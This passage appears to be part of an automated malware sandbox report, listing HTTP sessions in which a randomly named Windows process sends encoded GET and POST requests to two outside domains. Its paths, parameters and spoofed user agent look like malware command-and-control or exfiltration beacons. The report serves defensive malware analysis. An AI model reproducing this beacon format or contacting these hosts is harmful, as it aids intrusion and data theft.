                                                                  Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>


                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                  32192.168.2.450012209.74.77.107804348C:\Program Files (x86)\VGXiTMWYoqNhAAWsIwTYPzVQcfqznyXLRnxMuqxfvvDhJOmUxHgWpLjOhGnJewSO\hLRGQqcplWvpUw.exe
                                                                  TimestampBytes transferredDirectionData
                                                                  Dec 4, 2024 12:51:46.201370955 CET487OUTGET /alu5/?WnQdf=JhLPW&BTPDLZX=m83uTjDkEXAXcvpZaWV1PNYda+U7jg2fMbxp9Jcjydk1OP9q/x+Uq7Puqw1bWxP8wchYD7Gqx/Fq8mp+rVpxrxuW5VDk7Vq07uTWEP/Rgr9zrLSf1ip7NM4= HTTP/1.1
                                                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                  Accept-Language: en-US
                                                                  Host: www.learnwithus.site
                                                                  Connection: close
                                                                  User-Agent: UCWEB/2.0 (MIDP-2.0; U; Adr 2.3.6; id; GT-S6102) U2/1.0.0 UCBrowser/9.9.0.543 U2/1.0.0 Mobile
                                                                  Dec 4, 2024 12:51:47.415009975 CET548INHTTP/1.1 404 Not Found
                                                                  Date: Wed, 04 Dec 2024 11:51:47 GMT
                                                                  Server: Apache
                                                                  Content-Length: 389
                                                                  Connection: close
                                                                  Content-Type: text/html; charset=utf-8
                                                                  Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 [TRUNCATED]
                                                                  Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>


                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                  33192.168.2.450037104.21.34.103804348C:\Program Files (x86)\VGXiTMWYoqNhAAWsIwTYPzVQcfqznyXLRnxMuqxfvvDhJOmUxHgWpLjOhGnJewSO\hLRGQqcplWvpUw.exe
                                                                  TimestampBytes transferredDirectionData
                                                                  Dec 4, 2024 12:52:05.550359011 CET778OUTPOST /1jao/ HTTP/1.1
                                                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                  Accept-Encoding: gzip, deflate, br
                                                                  Accept-Language: en-US
                                                                  Host: www.rafconstrutora.online
                                                                  Origin: http://www.rafconstrutora.online
                                                                  Referer: http://www.rafconstrutora.online/1jao/
                                                                  Cache-Control: no-cache
                                                                  Content-Length: 204
                                                                  Connection: close
                                                                  Content-Type: application/x-www-form-urlencoded
                                                                  User-Agent: UCWEB/2.0 (MIDP-2.0; U; Adr 2.3.6; id; GT-S6102) U2/1.0.0 UCBrowser/9.9.0.543 U2/1.0.0 Mobile
                                                                  Data Raw: 42 54 50 44 4c 5a 58 3d 39 56 32 69 47 6c 47 39 33 38 77 42 4a 54 49 35 61 6a 65 54 4a 58 46 63 39 38 61 65 63 4a 71 30 68 6b 4b 42 50 69 34 49 6a 4b 4f 36 36 71 39 66 38 79 41 55 51 45 71 2f 48 68 4f 48 75 54 73 31 45 5a 51 76 49 68 76 72 30 62 4c 43 4d 4e 43 58 72 48 39 41 68 41 63 79 5a 75 7a 4f 65 6f 74 77 6a 5a 75 6b 45 33 4a 34 74 2b 48 6b 39 49 39 4d 45 30 36 47 43 4d 66 31 74 77 63 63 64 7a 4e 68 37 45 77 35 53 4d 4f 53 78 44 31 56 52 41 5a 43 57 54 65 6a 70 77 54 31 6a 58 35 2f 55 43 50 38 6c 36 45 73 46 6f 73 38 47 4a 56 4b 79 4d 31 2b 31 35 58 64 4e 69 6f 75 33 65 42 35 6f 6e 73 52 58 77 3d 3d
                                                                  Data Ascii: BTPDLZX=9V2iGlG938wBJTI5ajeTJXFc98aecJq0hkKBPi4IjKO66q9f8yAUQEq/HhOHuTs1EZQvIhvr0bLCMNCXrH9AhAcyZuzOeotwjZukE3J4t+Hk9I9ME06GCMf1twccdzNh7Ew5SMOSxD1VRAZCWTejpwT1jX5/UCP8l6EsFos8GJVKyM1+15XdNiou3eB5onsRXw==
                                                                  Dec 4, 2024 12:52:06.692665100 CET1236INHTTP/1.1 404 Not Found
                                                                  Date: Wed, 04 Dec 2024 11:52:06 GMT
                                                                  Content-Type: text/html
                                                                  Transfer-Encoding: chunked
                                                                  Connection: close
                                                                  Last-Modified: Thu, 29 Sep 2022 21:53:06 GMT
                                                                  Vary: Accept-Encoding
                                                                  CF-Cache-Status: DYNAMIC
                                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=H5P8%2Bt%2FBRk98M2pup3d%2BCsjvYqYTE%2BjDjrlCM2SvkzoaX1tHSMmDiEEV4hAfma9Ll3M3hMVMr5sk0rTE6f4t9fg19QV8BptutSmr0aFOUD1U7ojuw3j%2B6wIsKGAahLH%2B%2BFPAdHCJyq5pnLUU"}],"group":"cf-nel","max_age":604800}
                                                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                  Server: cloudflare
                                                                  CF-RAY: 8ecb96a06fc80f46-EWR
                                                                  Content-Encoding: gzip
                                                                  alt-svc: h3=":443"; ma=86400
                                                                  server-timing: cfL4;desc="?proto=TCP&rtt=1700&min_rtt=1700&rtt_var=850&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=778&delivery_rate=0&cwnd=224&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                  Data Raw: 33 33 66 0d 0a 1f 8b 08 00 00 00 00 00 00 03 ac 96 cd 6e db 46 10 c7 ef 01 f2 0e e3 3d 7b 45 91 b2 be 0a 92 40 eb b8 49 2f 4d d0 26 40 7b 2a 56 cb 11 b9 28 b9 43 ef 2c 29 ba 6f 63 f4 10 a0 40 9f 42 2f 56 50 51 24 51 71 5a b8 f6 89 3b dc 99 df cc 1f c3 dd 61 7c f1 ea ed f5 fb 5f df dd 40 e1 ab 32 7d f9 22 ee 9f 50 2a 9b 27 a2 f6 f2 bb 9f 44 fa f2 05 40 5c a0 ca 76 2b 80 b8 42 af 40 17 ca 31 fa 44 7c 78 ff bd 5c 88 c1 5e e1 7d 2d f1 b6 31 6d 22 7e 91 1f be 95 d7 54 d5 ca 9b 55 89 02 34 59 8f d6 27 e2 87 9b 04 b3 1c 87 a1 56 55 98 88 d6 e0 a6 26 e7 4f bc 37 26 f3 45 92 61 6b 34 ca 9d 71 09 c6 1a 6f 54 29 59 ab 12 93 f0 21 d2 9a 5c a5 bc cc d0 a3 f6 86 ec 09 d1 63 89 75 41 16 13 4b 0f 85 3a 5a 91 e7 93 00 4b c6 66 d8 1d 7c bd f1 25 a6 6f 88 6b cc 54 8e 15 64 08 3f 1b 8f a0 a9 82 57 54 6d ff b6 86 e0 b5 db de 7b c3 20 e1 0d b1 7f ad 3c b9 38 f8 14 ba e7 94 c6 fe 0e 0e cb 44 70 41 ce eb c6 83 d1 7d a9 85 c3 75 22 02 9d 1b c9 77 1c 98 4a e5 c8 c1 5a b5 fd f6 61 31 32 fa 58 ff 91 f5 18 84 9c 44 a3 da e6 02 [TRUNCATED]
                                                                  Data Ascii: 33fnF={E@I/M&@{*V(C,)oc@B/VPQ$QqZ;a|_@2}"P*'D@\v+B@1D|x\^}-1m"~TU4Y'VU&O7&Eak4qoT)Y!\cuAK:ZKf|%okTd?WTm{ <8DpA}u"wJZa12XDIM2s:
                                                                  Dec 4, 2024 12:52:06.692759037 CET503INData Raw: a7 32 e7 b3 01 73 3e eb e6 b3 a7 32 97 43 e6 72 d6 2d 9f cc 0c a3 c5 00 1a 46 8b 2e 8c 16 e2 99 5a 2e c3 e5 b0 61 e1 32 ea c2 e5 43 2d 53 75 5d a2 f4 d4 e8 42 3e 52 c2 f8 4c c2 b8 0b a3 f1 b3 a6 98 9e a9 98 46 5d 38 7d 5e 15 8b 33 15 8b 71 17 2e
                                                                  Data Ascii: 2s>2Cr-F.Z.a2C-Su]B>RLF]8}^3q.T4s"G#,w%r&=U]%>r343-R1'kWq_eAJNO=0Io#_A19#ok\O}NU;dVPoscEWCp w


                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                  34192.168.2.450038104.21.34.103804348C:\Program Files (x86)\VGXiTMWYoqNhAAWsIwTYPzVQcfqznyXLRnxMuqxfvvDhJOmUxHgWpLjOhGnJewSO\hLRGQqcplWvpUw.exe
                                                                  TimestampBytes transferredDirectionData
                                                                  Dec 4, 2024 12:52:08.220882893 CET798OUTPOST /1jao/ HTTP/1.1
                                                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                  Accept-Encoding: gzip, deflate, br
                                                                  Accept-Language: en-US
                                                                  Host: www.rafconstrutora.online
                                                                  Origin: http://www.rafconstrutora.online
                                                                  Referer: http://www.rafconstrutora.online/1jao/
                                                                  Cache-Control: no-cache
                                                                  Content-Length: 224
                                                                  Connection: close
                                                                  Content-Type: application/x-www-form-urlencoded
                                                                  User-Agent: UCWEB/2.0 (MIDP-2.0; U; Adr 2.3.6; id; GT-S6102) U2/1.0.0 UCBrowser/9.9.0.543 U2/1.0.0 Mobile
                                                                  Data Raw: 42 54 50 44 4c 5a 58 3d 39 56 32 69 47 6c 47 39 33 38 77 42 62 68 63 35 4a 53 65 54 65 6e 46 66 2b 38 61 65 46 35 71 77 68 6b 47 42 50 6e 63 59 6a 38 2b 36 39 4f 35 66 39 7a 41 55 58 45 71 2f 4d 42 4f 47 74 6a 73 41 45 5a 56 51 49 6c 7a 72 30 62 33 43 4d 4d 79 58 72 77 70 50 6a 51 63 77 52 4f 7a 41 42 34 74 77 6a 5a 75 6b 45 7a 68 65 74 2b 76 6b 68 72 56 4d 43 56 36 48 4d 73 66 32 71 77 63 63 4c 44 4e 6c 37 45 78 63 53 4a 79 73 78 41 64 56 52 42 70 43 58 43 65 67 6e 41 54 73 6e 58 34 66 64 44 75 53 6e 76 38 6e 41 4f 41 74 5a 4e 46 4f 2b 71 34 6b 6b 49 32 4b 66 69 4d 64 71 5a 49 4e 6c 6b 52 59 4d 37 6e 47 4b 57 61 51 59 71 31 6a 58 75 47 30 46 31 79 38 2f 70 49 3d
                                                                  Data Ascii: BTPDLZX=9V2iGlG938wBbhc5JSeTenFf+8aeF5qwhkGBPncYj8+69O5f9zAUXEq/MBOGtjsAEZVQIlzr0b3CMMyXrwpPjQcwROzAB4twjZukEzhet+vkhrVMCV6HMsf2qwccLDNl7ExcSJysxAdVRBpCXCegnATsnX4fdDuSnv8nAOAtZNFO+q4kkI2KfiMdqZINlkRYM7nGKWaQYq1jXuG0F1y8/pI=
                                                                  Dec 4, 2024 12:52:09.364029884 CET1236INHTTP/1.1 404 Not Found
                                                                  Date: Wed, 04 Dec 2024 11:52:09 GMT
                                                                  Content-Type: text/html
                                                                  Transfer-Encoding: chunked
                                                                  Connection: close
                                                                  Last-Modified: Thu, 29 Sep 2022 21:53:06 GMT
                                                                  Vary: Accept-Encoding
                                                                  CF-Cache-Status: DYNAMIC
                                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=Bz%2Fr7hIiGMqs1GErY73nJpl5Lf88jiKZHOv3R7MUmwkKHxxHhzT3C5Ax1jqxO%2Bq8zU1btX5HyqRE1%2FfDonpUQOXH7qq3Xn3CytqtYooCbkjjvndM1jrEhJZMPDnATpyD9Ui9FWlTM9P6bejJ"}],"group":"cf-nel","max_age":604800}
                                                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                  Server: cloudflare
                                                                  CF-RAY: 8ecb96b11bb842a0-EWR
                                                                  Content-Encoding: gzip
                                                                  alt-svc: h3=":443"; ma=86400
                                                                  server-timing: cfL4;desc="?proto=TCP&rtt=1738&min_rtt=1738&rtt_var=869&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=798&delivery_rate=0&cwnd=220&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                  Data Raw: 33 33 66 0d 0a 1f 8b 08 00 00 00 00 00 00 03 ac 96 cd 6e db 46 10 c7 ef 01 f2 0e e3 3d 7b 45 91 b2 be 0a 92 40 eb b8 49 2f 4d d0 26 40 7b 2a 56 cb 11 b9 28 b9 43 ef 2c 29 ba 6f 63 f4 10 a0 40 9f 42 2f 56 50 51 24 51 71 5a b8 f6 89 3b dc 99 df cc 1f c3 dd 61 7c f1 ea ed f5 fb 5f df dd 40 e1 ab 32 7d f9 22 ee 9f 50 2a 9b 27 a2 f6 f2 bb 9f 44 fa f2 05 40 5c a0 ca 76 2b 80 b8 42 af 40 17 ca 31 fa 44 7c 78 ff bd 5c 88 c1 5e e1 7d 2d f1 b6 31 6d 22 7e 91 1f be 95 d7 54 d5 ca 9b 55 89 02 34 59 8f d6 27 e2 87 9b 04 b3 1c 87 a1 56 55 98 88 d6 e0 a6 26 e7 4f bc 37 26 f3 45 92 61 6b 34 ca 9d 71 09 c6 1a 6f 54 29 59 ab 12 93 f0 21 d2 9a 5c a5 bc cc d0 a3 f6 86 ec 09 d1 63 89 75 41 16 13 4b 0f 85 3a 5a 91 e7 93 00 4b c6 66 d8 1d 7c bd f1 25 a6 6f 88 6b cc 54 8e 15 64 08 3f 1b 8f a0 a9 82 57 54 6d ff b6 86 e0 b5 db de 7b c3 20 e1 0d b1 7f ad 3c b9 38 f8 14 ba e7 94 c6 fe 0e 0e cb 44 70 41 ce eb c6 83 d1 7d a9 85 c3 75 22 02 9d 1b c9 77 1c 98 4a e5 c8 c1 5a b5 fd f6 61 31 32 fa 58 ff 91 f5 18 84 9c 44 a3 da e6 02 [TRUNCATED]
                                                                  Data Ascii: 33fnF={E@I/M&@{*V(C,)oc@B/VPQ$QqZ;a|_@2}"P*'D@\v+B@1D|x\^}-1m"~TU4Y'VU&O7&Eak4qoT)Y!\cuAK:ZKf|%okTd?WTm{ <8DpA}u"wJZa12XDIM2s:2s>
                                                                  Dec 4, 2024 12:52:09.364093065 CET495INData Raw: e6 b3 a7 32 97 43 e6 72 d6 2d 9f cc 0c a3 c5 00 1a 46 8b 2e 8c 16 e2 99 5a 2e c3 e5 b0 61 e1 32 ea c2 e5 43 2d 53 75 5d a2 f4 d4 e8 42 3e 52 c2 f8 4c c2 b8 0b a3 f1 b3 a6 98 9e a9 98 46 5d 38 7d 5e 15 8b 33 15 8b 71 17 2e ce 54 9c b1 34 73 b0 22
                                                                  Data Ascii: 2Cr-F.Z.a2C-Su]B>RLF]8}^3q.T4s"G#,w%r&=U]%>r343-R1'kWq_eAJNO=0Io#_A19#ok\O}NU;dVPoscEWCp wVKz


                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                  35192.168.2.450039104.21.34.103804348C:\Program Files (x86)\VGXiTMWYoqNhAAWsIwTYPzVQcfqznyXLRnxMuqxfvvDhJOmUxHgWpLjOhGnJewSO\hLRGQqcplWvpUw.exe
                                                                  TimestampBytes transferredDirectionData
                                                                  Dec 4, 2024 12:52:10.892441034 CET10880OUTPOST /1jao/ HTTP/1.1
                                                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                  Accept-Encoding: gzip, deflate, br
                                                                  Accept-Language: en-US
                                                                  Host: www.rafconstrutora.online
                                                                  Origin: http://www.rafconstrutora.online
                                                                  Referer: http://www.rafconstrutora.online/1jao/
                                                                  Cache-Control: no-cache
                                                                  Content-Length: 10304
                                                                  Connection: close
                                                                  Content-Type: application/x-www-form-urlencoded
                                                                  User-Agent: UCWEB/2.0 (MIDP-2.0; U; Adr 2.3.6; id; GT-S6102) U2/1.0.0 UCBrowser/9.9.0.543 U2/1.0.0 Mobile
                                                                  Data Raw: 42 54 50 44 4c 5a 58 3d 39 56 32 69 47 6c 47 39 33 38 77 42 62 68 63 35 4a 53 65 54 65 6e 46 66 2b 38 61 65 46 35 71 77 68 6b 47 42 50 6e 63 59 6a 38 32 36 36 37 74 66 38 51 59 55 57 45 71 2f 46 68 4f 44 74 6a 73 6e 45 5a 74 55 49 6c 2f 56 30 65 7a 43 4f 75 36 58 6a 68 70 50 71 51 63 77 4f 2b 7a 4e 65 6f 74 68 6a 5a 2b 67 45 33 46 65 74 2b 76 6b 68 74 70 4d 42 45 36 48 42 4d 66 31 74 77 63 6d 64 7a 4e 64 37 45 35 71 53 49 6a 5a 78 51 39 56 52 68 35 43 51 30 71 67 6c 67 54 75 69 58 34 39 64 44 69 52 6e 76 4a 65 41 4b 41 48 5a 4b 31 4f 76 2b 4e 65 32 6f 48 55 65 7a 73 5a 2f 72 55 6f 68 54 31 62 4b 70 4c 38 61 30 43 6c 62 4c 45 55 51 2f 7a 51 41 6b 65 69 70 4f 45 32 44 32 6f 70 49 6f 53 73 6a 30 6b 62 2f 30 50 76 66 58 31 71 4c 61 47 51 4e 35 78 54 58 63 6f 6a 2b 45 52 34 6a 67 63 43 30 41 6a 5a 30 4e 30 44 42 70 5a 59 30 55 49 37 56 33 6e 39 34 75 45 69 69 46 63 34 2f 73 6e 64 61 57 47 55 6e 37 4a 62 72 4f 6b 36 50 75 79 46 59 49 4e 4b 57 56 59 6c 4f 56 30 73 4e 4a 2b 67 59 64 46 6d 4f 4f 4e 6f 6e 6f [TRUNCATED]
                                                                  Data Ascii: BTPDLZX=9V2iGlG938wBbhc5JSeTenFf+8aeF5qwhkGBPncYj82667tf8QYUWEq/FhODtjsnEZtUIl/V0ezCOu6XjhpPqQcwO+zNeothjZ+gE3Fet+vkhtpMBE6HBMf1twcmdzNd7E5qSIjZxQ9VRh5CQ0qglgTuiX49dDiRnvJeAKAHZK1Ov+Ne2oHUezsZ/rUohT1bKpL8a0ClbLEUQ/zQAkeipOE2D2opIoSsj0kb/0PvfX1qLaGQN5xTXcoj+ER4jgcC0AjZ0N0DBpZY0UI7V3n94uEiiFc4/sndaWGUn7JbrOk6PuyFYINKWVYlOV0sNJ+gYdFmOONonoMY3eh0yEXIhKcQmr44p4r32PRLn9XwdiB2OUNZxXqrP3SzHH0HEp+7Uw/wxWqNgWF65YK/2sO9tQCicOLq+f4Y8wv/vo+or4f5LlP7Qr7XWVLLXeFjy1XeO5fhjc/8kCNor02F6SCQ9Y+mjgYR+ZSfh5Ta0mddfTeK1qBpDiYC8Z1hvSx+ojMOUlQ4PMQgRTzwxt22ZWRYDiGpIkXvhvjUXWtlffZn9FZhdmNS8mIkmCLqBW3byje9KdOsLzYffsvMuCpm1EL3jA8HMouJC45ixybxOh5rEAGC+o30jsMx8HlRKar8/D/Q6evHs260em6/hfRRuBfIFKcFH6LtGtO4ootl5lCy6MK6GWEQ9RAkn3sLWb4FvW2YeNjZpT9Pk9+kSbQ07sFy+bnnz5wHJMMVitpdlcNI5NTTzHIEtDm5pRviEjdg2J/Rx6tnVT99kH4c29DUKI8xuiXnvnUGwQc2bnrXona917eZZN7MfA1tQK4Y8+6tPpv2l2EYBL9l5Z7wzErXr8+v3mNs/Y52hpQw4/68aE/4OqEfKDFkXOcKYX8+I8jPebn53MgFsj85Cdvu4ufuTTmcppm6PAdbINiNfPlQk4Z1FEvoZjAHRFkTXnkkhph50gufkgEyJ3M3TiuIztSh2D4f0vmswxybmViEkt0TutIm3TqN [TRUNCATED]
                                                                  Dec 4, 2024 12:52:12.088907003 CET1236INHTTP/1.1 404 Not Found
                                                                  Date: Wed, 04 Dec 2024 11:52:11 GMT
                                                                  Content-Type: text/html
                                                                  Transfer-Encoding: chunked
                                                                  Connection: close
                                                                  Last-Modified: Thu, 29 Sep 2022 21:53:06 GMT
                                                                  Vary: Accept-Encoding
                                                                  CF-Cache-Status: DYNAMIC
                                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=8eWob8r6a%2B55cpwZ%2BltXNT6hTHR3GJj45T%2F5P%2FcT%2BfijU9y9Hm4fHcXIdDHdqjoRJgEA2d7pnlNaVm7YiVtI%2BkMMDhSxWj4X0TAAPA0c0yczfBGG8cm9o%2FsFxgZ5g5eWJj3UQgA2DqEKefqW"}],"group":"cf-nel","max_age":604800}
                                                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                  Server: cloudflare
                                                                  CF-RAY: 8ecb96c20a374369-EWR
                                                                  Content-Encoding: gzip
                                                                  alt-svc: h3=":443"; ma=86400
                                                                  server-timing: cfL4;desc="?proto=TCP&rtt=2459&min_rtt=2459&rtt_var=1229&sent=5&recv=11&lost=0&retrans=0&sent_bytes=0&recv_bytes=10880&delivery_rate=0&cwnd=228&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                  Data Raw: 33 33 66 0d 0a 1f 8b 08 00 00 00 00 00 00 03 ac 96 cd 6e db 46 10 c7 ef 01 f2 0e e3 3d 7b 45 91 b2 be 0a 92 40 eb b8 49 2f 4d d0 26 40 7b 2a 56 cb 11 b9 28 b9 43 ef 2c 29 ba 6f 63 f4 10 a0 40 9f 42 2f 56 50 51 24 51 71 5a b8 f6 89 3b dc 99 df cc 1f c3 dd 61 7c f1 ea ed f5 fb 5f df dd 40 e1 ab 32 7d f9 22 ee 9f 50 2a 9b 27 a2 f6 f2 bb 9f 44 fa f2 05 40 5c a0 ca 76 2b 80 b8 42 af 40 17 ca 31 fa 44 7c 78 ff bd 5c 88 c1 5e e1 7d 2d f1 b6 31 6d 22 7e 91 1f be 95 d7 54 d5 ca 9b 55 89 02 34 59 8f d6 27 e2 87 9b 04 b3 1c 87 a1 56 55 98 88 d6 e0 a6 26 e7 4f bc 37 26 f3 45 92 61 6b 34 ca 9d 71 09 c6 1a 6f 54 29 59 ab 12 93 f0 21 d2 9a 5c a5 bc cc d0 a3 f6 86 ec 09 d1 63 89 75 41 16 13 4b 0f 85 3a 5a 91 e7 93 00 4b c6 66 d8 1d 7c bd f1 25 a6 6f 88 6b cc 54 8e 15 64 08 3f 1b 8f a0 a9 82 57 54 6d ff b6 86 e0 b5 db de 7b c3 20 e1 0d b1 7f ad 3c b9 38 f8 14 ba e7 94 c6 fe 0e 0e cb 44 70 41 ce eb c6 83 d1 7d a9 85 c3 75 22 02 9d 1b c9 77 1c 98 4a e5 c8 c1 5a b5 fd f6 61 31 32 fa 58 ff 91 f5 18 84 9c 44 a3 da e6 02 [TRUNCATED]
                                                                  Data Ascii: 33fnF={E@I/M&@{*V(C,)oc@B/VPQ$QqZ;a|_@2}"P*'D@\v+B@1D|x\^}-1m"~TU4Y'VU&O7&Eak4qoT)Y!\cuAK:ZKf|%okTd?WTm{ <8DpA}u"wJZa12XDIM2s
                                                                  Dec 4, 2024 12:52:12.089037895 CET485INData Raw: 3a ef a6 f3 a7 32 e7 b3 01 73 3e eb e6 b3 a7 32 97 43 e6 72 d6 2d 9f cc 0c a3 c5 00 1a 46 8b 2e 8c 16 e2 99 5a 2e c3 e5 b0 61 e1 32 ea c2 e5 43 2d 53 75 5d a2 f4 d4 e8 42 3e 52 c2 f8 4c c2 b8 0b a3 f1 b3 a6 98 9e a9 98 46 5d 38 7d 5e 15 8b 33 15
                                                                  Data Ascii: :2s>2Cr-F.Z.a2C-Su]B>RLF]8}^3q.T4s"G#,w%r&=U]%>r343-R1'kWq_eAJNO=0Io#_A19#ok\O}NU;dVPoscEWCp
                                                                  Dec 4, 2024 12:52:12.089854002 CET22INData Raw: 63 0d 0a e3 e5 02 00 66 df cc 8d 39 09 00 00 0d 0a 30 0d 0a 0d 0a
                                                                  Data Ascii: cf90


                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                  36192.168.2.450040104.21.34.103804348C:\Program Files (x86)\VGXiTMWYoqNhAAWsIwTYPzVQcfqznyXLRnxMuqxfvvDhJOmUxHgWpLjOhGnJewSO\hLRGQqcplWvpUw.exe
                                                                  TimestampBytes transferredDirectionData
                                                                  Dec 4, 2024 12:52:13.560717106 CET492OUTGET /1jao/?WnQdf=JhLPW&BTPDLZX=wXeCFQWa9OsffQZ1KRXPZEZX8+i6d5mUhyyCbFo+uZizrpQ17AwBRErPIC2GsWEsFfVeFw/t98C8OszppSdM3wkRcNb8cvMpvLzxOiNeiMb5wrheE0z0IqI= HTTP/1.1
                                                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                  Accept-Language: en-US
                                                                  Host: www.rafconstrutora.online
                                                                  Connection: close
                                                                  User-Agent: UCWEB/2.0 (MIDP-2.0; U; Adr 2.3.6; id; GT-S6102) U2/1.0.0 UCBrowser/9.9.0.543 U2/1.0.0 Mobile
                                                                  Dec 4, 2024 12:52:14.720558882 CET1236INHTTP/1.1 404 Not Found
                                                                  Date: Wed, 04 Dec 2024 11:52:14 GMT
                                                                  Content-Type: text/html
                                                                  Transfer-Encoding: chunked
                                                                  Connection: close
                                                                  Last-Modified: Thu, 29 Sep 2022 21:53:06 GMT
                                                                  Vary: Accept-Encoding
                                                                  CF-Cache-Status: DYNAMIC
                                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=1mdB9%2FHMPu2jvQpp4Ko2FVk%2B3wGJaq0RaGC6QZWTT0v4mrzR%2BITXBDVQZNvA0f6qd23mLiqqNbVonFMEM30IsQ4045EZpI%2BhJY%2FWhcdawJaxiauOVj1vpUASfTvIWWPvDyZ8Of7Elq2vmhsJ"}],"group":"cf-nel","max_age":604800}
                                                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                  Server: cloudflare
                                                                  CF-RAY: 8ecb96d288b5c461-EWR
                                                                  alt-svc: h3=":443"; ma=86400
                                                                  server-timing: cfL4;desc="?proto=TCP&rtt=1467&min_rtt=1467&rtt_var=733&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=492&delivery_rate=0&cwnd=226&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                  Data Raw: 39 33 39 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0d 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 70 74 2d 42 52 22 3e 0d 0a 20 20 3c 68 65 61 64 3e 0d 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0d 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 58 2d 55 41 2d 43 6f 6d 70 61 74 69 62 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 49 45 3d 65 64 67 65 22 3e 0d 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 0d 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 66 6f 72 6d 61 74 2d 64 65 74 65 63 74 69 6f 6e 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 6c 65 70 68 6f 6e 65 3d 6e 6f 22 3e 0d 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 72 6f 62 6f 74 73 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 69 6e 64 65 78 22 3e 0d 0a 20 20 20 20 3c 74 69 74 6c 65 3e 48 6f 73 70 65 64 61 67 65 6d [TRUNCATED]
